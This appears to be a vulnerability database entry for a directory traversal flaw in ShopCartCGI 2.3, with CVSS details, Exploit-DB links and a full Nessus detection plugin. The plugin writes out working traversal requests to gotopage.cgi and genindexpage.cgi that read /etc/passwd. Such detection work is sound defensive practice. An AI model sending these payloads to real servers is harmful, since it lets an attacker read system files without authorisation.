Vulnerabilities > CVE-2004-0293 - Remote File Disclosure vulnerability in Shopcartcgi 2.3

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
shopcartcgi
nessus
exploit available
NVD
Published: 2004-11-23
Updated: 2017-07-11

Summary

Directory traversal vulnerability in ShopCartCGI 2.3 allows remote attackers to retrieve arbitrary files via a .. (dot dot) in a HTTP request to (1) gotopage.cgi or (2) genindexpage.cgi.

Vulnerable Configurations

Part Description Count
Application
Shopcartcgi
1

Exploit-Db

  • descriptionShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access. CVE-2004-0293. Webapps exploit for cgi platform
    idEDB-ID:23706
    last seen2016-02-02
    modified2004-02-16
    published2004-02-16
    reporterG00db0y
    sourcehttps://www.exploit-db.com/download/23706/
    titleShopCartCGI 2.3 genindexpage.cgi Traversal Arbitrary File Access
  • descriptionShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access. CVE-2004-0293. Webapps exploit for cgi platform
    idEDB-ID:23705
    last seen2016-02-02
    modified2004-02-16
    published2004-02-16
    reporterG00db0y
    sourcehttps://www.exploit-db.com/download/23705/
    titleShopCartCGI 2.3 gotopage.cgi Traversal Arbitrary File Access

Nessus

NASL familyCGI abuses
NASL idSHOPCARTCGI_TRAVERSAL.NASL
descriptionThe remote host is running ShopCartCGI - a set of CGIs designed to set up an on-line shopping cart. The version of ShopCartCGI on the remote host fails to sanitize input to several of its CGI scripts before using it to read and display files. An unauthenticated, remote attacker can leverage these issues to read arbitrary files on the remote web server with the privileges of the web user.
last seen2020-06-01
modified2020-06-02
plugin id12064
published2004-02-17
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12064
titleShopCartCGI Multiple Script Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(12064);
 script_version ("1.23");

 script_cve_id("CVE-2004-0293");
 script_bugtraq_id(9670);
 
 script_name(english:"ShopCartCGI Multiple Script Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI application that is affected by 
multiple arbitrary file access issues." );
 script_set_attribute(attribute:"description", value:
"The remote host is running ShopCartCGI - a set of CGIs designed to set
up an on-line shopping cart. 

The version of ShopCartCGI on the remote host fails to sanitize input
to several of its CGI scripts before using it to read and display
files.  An unauthenticated, remote attacker can leverage these issues
to read arbitrary files on the remote web server with the privileges of
the web user." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/454");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/02/17");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/02/17");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Checks ShopCart");
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 w = http_send_recv3(method:"GET", port: port,
   item: strcat(dir,"/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd"));
 if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
 buf = strcat(w[0], w[1], '\r\n', w[2]);

 if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf)){
 	security_warning(port);
	exit(0);
 }

 if (thorough_tests){
   w = http_send_recv3(method:"GET", port: port,
     item: strcat(dir,"/genindexpage.cgi?4242+Home+/../../../../../../../../../../../../../etc/passwd"));
   if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
   buf = strcat(w[0], w[1], '\r\n', w[2]);

   if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf)){
   	security_warning(port);
  	exit(0);
   }
 }
}

References